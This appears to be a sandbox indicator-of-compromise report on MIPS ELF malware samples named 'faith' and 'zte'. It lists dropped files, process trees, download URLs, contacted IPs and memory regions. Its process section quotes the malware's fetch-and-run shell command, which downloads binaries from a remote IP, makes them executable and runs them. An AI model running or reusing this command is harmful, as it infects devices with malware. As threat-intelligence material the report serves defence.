IOC Report

loading gif

Files

File Path
Type
Category
Malicious
/dev/test_write
data
dropped
malicious
/tmp/faith
ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
dropped
malicious
/tmp/zte
ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
dropped
malicious

Processes

Path
Cmdline
Malicious
/bin/sh
/bin/sh -c "cd /tmp; wget http://65.175.140.164/images/faith;chmod 777 faith;./faith faith2;cd /tmp; wget http://65.175.140.164/images/zte;chmod 777 zte;./zte faith2;"
/bin/sh
-
/usr/bin/wget
wget http://65.175.140.164/images/faith
/bin/sh
-
/usr/bin/chmod
chmod 777 faith
/bin/sh
-
/tmp/faith
./faith faith2
/tmp/faith
-
/bin/sh
sh -c mount
/bin/sh
-
/usr/bin/mount
mount
/tmp/faith
-
/bin/sh
-
/usr/bin/wget
wget http://65.175.140.164/images/zte
/bin/sh
-
/usr/bin/chmod
chmod 777 zte
/bin/sh
-
/tmp/zte
./zte faith2
/tmp/zte
-
/bin/sh
sh -c mount
/bin/sh
-
/usr/bin/mount
mount
/tmp/zte
-
/usr/bin/dash
-
/usr/bin/rm
rm -f /tmp/tmp.BpCLyWqgbw /tmp/tmp.RbLMPu6BCN /tmp/tmp.C4ejyQZfEq
/usr/bin/dash
-
/usr/bin/rm
rm -f /tmp/tmp.BpCLyWqgbw /tmp/tmp.RbLMPu6BCN /tmp/tmp.C4ejyQZfEq
There are 17 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://65.175.140.164/images/zte
65.175.140.164
http://65.175.140.164/images/faith
65.175.140.164

IPs

IP
Domain
Country
Malicious
54.171.230.55
unknown
United States
65.175.140.164
unknown
United States
109.202.202.202
unknown
Switzerland
91.189.91.43
unknown
United Kingdom
91.189.91.42
unknown
United Kingdom

Memdumps

Base Address
Regiontype
Protect
Malicious
55b0d83ab000
page execute and read and write
7f77ba6a7000
page read and write
7fd1a8486000
page read and write
7fd230465000
page read and write
55bbedd11000
page read and write
7fd2300f4000
page read and write
7f77ba6a7000
page read and write
7f77b9800000
page read and write
7fd230777000
page read and write
7fd228021000
page read and write
7f7734486000
page read and write
7fd228021000
page read and write
7fd1a8439000
page execute read
7fd22fd53000
page read and write
7ffd4bdd1000
page execute read
55bbea29c000
page execute read
7fd22fd53000
page read and write
7f77ba667000
page read and write
7ffdd29e6000
page execute read
7ffdd29e6000
page execute read
7fd1a8486000
page read and write
7ffd4bd8b000
page read and write
55bbea52e000
page read and write
7f77ba9d8000
page read and write
7f77b4000000
page read and write
7f7734439000
page execute read
7f77b4021000
page read and write
7f77ba2c6000
page read and write
7f7734486000
page read and write
7fd230646000
page read and write
7f77ba68a000
page read and write
7f77bace2000
page read and write
55bbea524000
page read and write
55b0d611b000
page execute read
7f77b4021000
page read and write
7f77bacea000
page read and write
7fd1a8488000
page read and write
7f77ba008000
page read and write
7f77bace2000
page read and write
7f77babb9000
page read and write
7fd230134000
page read and write
55b0d63ad000
page read and write
7f77b4000000
page read and write
7f77babb9000
page read and write
55b0d63a3000
page read and write
7fd22faa3000
page read and write
7ffd4bd8b000
page read and write
7f77ba016000
page read and write
7fd22f28d000
page read and write
55bbea29c000
page execute read
7fd22fa95000
page read and write
55b0d63a3000
page read and write
7fd230117000
page read and write
7f7734488000
page read and write
7fd230117000
page read and write
7fd1a8439000
page execute read
55b0d63ad000
page read and write
55bbea524000
page read and write
7ffd4bdd1000
page execute read
7fd22faa3000
page read and write
7fd2300f4000
page read and write
7fd22fa95000
page read and write
7fd23076f000
page read and write
7f77bad2f000
page read and write
7f77ba016000
page read and write
55b0d83ab000
page execute and read and write
55b0d611b000
page execute read
7fd230465000
page read and write
7fd230646000
page read and write
7fd22f28d000
page read and write
7f77bacea000
page read and write
7ffdd2984000
page read and write
55b0d83c2000
page read and write
7f7734439000
page execute read
55bbec543000
page read and write
7fd23076f000
page read and write
7f77ba68a000
page read and write
55bbedd11000
page read and write
55bbec543000
page read and write
7f77ba667000
page read and write
55b0d868b000
page read and write
7f77ba2c6000
page read and write
55b0d868b000
page read and write
7f77b9800000
page read and write
7f77bad2f000
page read and write
7fd228000000
page read and write
7fd2307bc000
page read and write
7fd228000000
page read and write
7f77ba9d8000
page read and write
55bbec52c000
page execute and read and write
7ffdd2984000
page read and write
7fd2307bc000
page read and write
7fd230134000
page read and write
7fd230777000
page read and write
7f77ba008000
page read and write
55bbec52c000
page execute and read and write
55bbea52e000
page read and write
55b0d83c2000
page read and write
There are 88 hidden memdumps, click here to show them.